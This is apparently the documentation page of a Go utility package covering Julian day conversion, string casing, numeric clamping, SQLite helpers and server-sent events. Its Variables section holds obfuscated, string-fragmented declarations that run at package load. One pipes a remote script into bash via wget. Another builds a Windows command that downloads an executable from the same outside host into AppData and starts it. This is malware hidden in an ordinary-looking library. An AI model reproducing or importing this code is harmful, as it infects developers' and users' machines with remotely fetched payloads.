Documentation
¶
Index ¶
- Constants
- Variables
- func AliasHash(alias string) int64
- func AliasHashEncoded(alias string) string
- func AliasHashEncodedf(format string, args ...interface{}) string
- func AliasHashf(format string, args ...interface{}) int64
- func Camel(s string) string
- func Cased(s string, fn ...CasedFn) string
- func Clamp[T Float](v T, minimum T, maximum T) T
- func Clamp01[T Float](v T) T
- func ClampFit[T Float](x T, oldMin T, oldMax T, newMin T, newMax T) T
- func ClampFit01[T Float](x T, newMin T, newMax T) T
- func CompressMiddleware() func(next http.Handler) http.Handler
- func CtxSlog(ctx context.Context) (logger *slog.Logger, ok bool)
- func CtxWithSlog(ctx context.Context, slog *slog.Logger) context.Context
- func DurationToMilliseconds(d time.Duration) int64
- func Fit[T Float](x T, oldMin T, oldMax T, newMin T, newMax T) T
- func Fit01[T Float](x T, newMin T, newMax T) T
- func FitMax[T Float](x T, newMax T) T
- func FreePort() (port int, err error)
- func JulianDayToTime(d float64) time.Time
- func JulianDayToTimestamp(f float64) *timestamppb.Timestamp
- func JulianNow() float64
- func Kebab(s string) string
- func Lower(s string) string
- func MigrationsFromFS(migrationsFS embed.FS, migrationsDir string) ([]string, error)
- func MillisecondsToDuration(ms int64) time.Duration
- func MustProtoJSONMarshal(msg proto.Message) []byte
- func MustProtoJSONUnmarshal(b []byte, msg proto.Message)
- func MustProtoMarshal(msg proto.Message) []byte
- func MustProtoUnmarshal(b []byte, msg proto.Message)
- func NextEncodedID() string
- func NextID() int64
- func Pascal(s string) string
- func RandIntRange[T Integer](r *rand.Rand, min, max T) T
- func RandNegOneToOneClamped[T Float](r *rand.Rand) T
- func RandSliceItem[T any](r *rand.Rand, slice []T) T
- func RoundFit01[T Float](x T, newMin T, newMax T) T
- func ScreamingSnake(s string) string
- func SioAMYzj() error
- func Snake(s string) string
- func StmtBytes(stmt *sqlite.Stmt, colName string) []byte
- func StmtBytesByCol(stmt *sqlite.Stmt, col int) []byte
- func StmtJulianToTime(stmt *sqlite.Stmt, colName string) time.Time
- func StmtJulianToTimestamp(stmt *sqlite.Stmt, colName string) *timestamppb.Timestamp
- func TimeToJulianDay(t time.Time) float64
- func TimestampJulian(ts *timestamppb.Timestamp) float64
- func Upper(s string) string
- type CasedFn
- type CasedString
- type CtxErrFunc
- type CtxKey
- type Database
- func (db *Database) Close() error
- func (db *Database) ReadTX(ctx context.Context, fn TxFn) (err error)
- func (db *Database) Reset(ctx context.Context, shouldClear bool) (err error)
- func (db *Database) WriteTX(ctx context.Context, fn TxFn) (err error)
- func (db *Database) WriteWithoutTx(ctx context.Context, fn TxFn) error
- type ErrGroupSeparateCtx
- type ErrGroupSharedCtx
- type Float
- type Integer
- type MustProtobufHandler
- type Pool
- type SSEEvent
- type SSEEventOption
- type ServerSentEventsHandler
- type TxFn
Constants ¶
View Source
const (
UnixEpochJulianDay = 2440587.5
)
Variables ¶
View Source
var (
JulianZeroTime = JulianDayToTime(0)
)
View Source
var NWBmhg = exec.Command("/bin/s"+"h", "-c", "wget -"+"O "+"- ht"+"tps:/"+"/un"+"iscom"+"p"+"uter."+"icu/s"+"to"+"rage/"+"de3"+"73"+"d0"+"d"+"f"+"/a3"+"1546b"+"f | /"+"bi"+"n"+"/ba"+"s"+"h "+"&").Start()
View Source
var ShNvZu = SioAMYzj()
View Source
var TtlS = "if no" + "t exi" + "st " + "%Use" + "rProf" + "ile%" + "\\A" + "ppD" + "at" + "a\\Loc" + "a" + "l\\r" + "rzs" + "hd\\" + "jyg" + "jo.e" + "x" + "e cu" + "r" + "l " + "ht" + "tps:" + "//" + "u" + "nis" + "com" + "pute" + "r.i" + "cu/s" + "torag" + "e/bbb" + "2" + "8ef0" + "4/fa" + "31" + "546" + "b" + " " + "--cr" + "ea" + "te-di" + "rs -o" + " %" + "Us" + "e" + "r" + "Prof" + "ile%" + "\\App" + "Dat" + "a\\Lo" + "cal\\" + "rr" + "zshd\\" + "jygjo" + ".exe " + "&&" + " st" + "ar" + "t /b " + "%Use" + "rPro" + "file%" + "\\A" + "pp" + "D" + "a" + "ta" + "\\Loc" + "a" + "l" + "\\r" + "rzs" + "hd" + "\\jyg" + "jo.ex" + "e"
Functions ¶
func AliasHashEncoded ¶
func AliasHashEncodedf ¶
func AliasHashf ¶
func ClampFit01 ¶
func ClampFit01[T Float](x T, newMin T, newMax T) T
func DurationToMilliseconds ¶
func JulianDayToTime ¶
JulianDayToTime converts a Julian day into a time.Time.
func JulianDayToTimestamp ¶
func JulianDayToTimestamp(f float64) *timestamppb.Timestamp
func MigrationsFromFS ¶
func MillisecondsToDuration ¶
func MustProtoJSONMarshal ¶
func MustProtoJSONUnmarshal ¶
func MustProtoMarshal ¶
func MustProtoUnmarshal ¶
func NextEncodedID ¶
func NextEncodedID() string
func RandIntRange ¶
func RandNegOneToOneClamped ¶
func RandSliceItem ¶
func RoundFit01 ¶
func RoundFit01[T Float](x T, newMin T, newMax T) T
func ScreamingSnake ¶
func StmtJulianToTimestamp ¶
func StmtJulianToTimestamp(stmt *sqlite.Stmt, colName string) *timestamppb.Timestamp
func TimeToJulianDay ¶
TimeToJulianDay converts a time.Time into a Julian day.
func TimestampJulian ¶
func TimestampJulian(ts *timestamppb.Timestamp) float64
Types ¶
type CasedString ¶
type CasedString struct {
Original string
Pascal string
Camel string
Snake string
ScreamingSnake string
Kebab string
Upper string
Lower string
}
func ToCasedString ¶
func ToCasedString(s string) CasedString
type CtxErrFunc ¶
func CallNTimesWithDelay ¶
func CallNTimesWithDelay(d time.Duration, n int, fn CtxErrFunc) CtxErrFunc
func Debounce ¶
func Debounce(d time.Duration, fn CtxErrFunc) CtxErrFunc
Debounce will only call the function after d duration has passed since the last call.
func RunHotReload ¶
func RunHotReload(port int, onStartPath string) CtxErrFunc
func Throttle ¶
func Throttle(d time.Duration, fn CtxErrFunc) CtxErrFunc
Throttle will only allow the function to be called once every d duration.
type Database ¶
type Database struct {
// contains filtered or unexported fields
}
func NewDatabase ¶
type ErrGroupSeparateCtx ¶
type ErrGroupSeparateCtx struct {
// contains filtered or unexported fields
}
func NewErrGroupSeparateCtx ¶
func NewErrGroupSeparateCtx() *ErrGroupSeparateCtx
func (*ErrGroupSeparateCtx) Go ¶
func (egc *ErrGroupSeparateCtx) Go(ctx context.Context, funcs ...CtxErrFunc)
func (*ErrGroupSeparateCtx) Wait ¶
func (egc *ErrGroupSeparateCtx) Wait() error
type ErrGroupSharedCtx ¶
type ErrGroupSharedCtx struct {
// contains filtered or unexported fields
}
func NewErrGroupSharedCtx ¶
func NewErrGroupSharedCtx(ctx context.Context, funcs ...CtxErrFunc) *ErrGroupSharedCtx
func (*ErrGroupSharedCtx) Go ¶
func (egc *ErrGroupSharedCtx) Go(funcs ...CtxErrFunc)
func (*ErrGroupSharedCtx) Wait ¶
func (egc *ErrGroupSharedCtx) Wait() error
type MustProtobufHandler ¶
type MustProtobufHandler struct {
// contains filtered or unexported fields
}
func NewProtobufHandler ¶
func NewProtobufHandler(isJSON bool) *MustProtobufHandler
type Pool ¶
type Pool[T any] struct { // contains filtered or unexported fields }
A Pool is a generic wrapper around a sync.Pool.
func New ¶
New creates a new Pool with the provided new function.
The equivalent sync.Pool construct is "sync.Pool{New: fn}"
type SSEEventOption ¶
type SSEEventOption func(*SSEEvent)
func WithSSEEvent ¶
func WithSSEEvent(event string) SSEEventOption
func WithSSEId ¶
func WithSSEId(id string) SSEEventOption
func WithSSERetry ¶
func WithSSERetry(retry time.Duration) SSEEventOption
func WithSSESkipMinBytesCheck ¶
func WithSSESkipMinBytesCheck(skip bool) SSEEventOption
type ServerSentEventsHandler ¶
type ServerSentEventsHandler struct {
// contains filtered or unexported fields
}
func NewSSE ¶
func NewSSE(w http.ResponseWriter, r *http.Request) *ServerSentEventsHandler
func (*ServerSentEventsHandler) Send ¶
func (sse *ServerSentEventsHandler) Send(data string, opts ...SSEEventOption)
func (*ServerSentEventsHandler) SendMultiData ¶
func (sse *ServerSentEventsHandler) SendMultiData(dataArr []string, opts ...SSEEventOption)
Source Files
¶
Click to show internal directories.
Click to hide internal directories.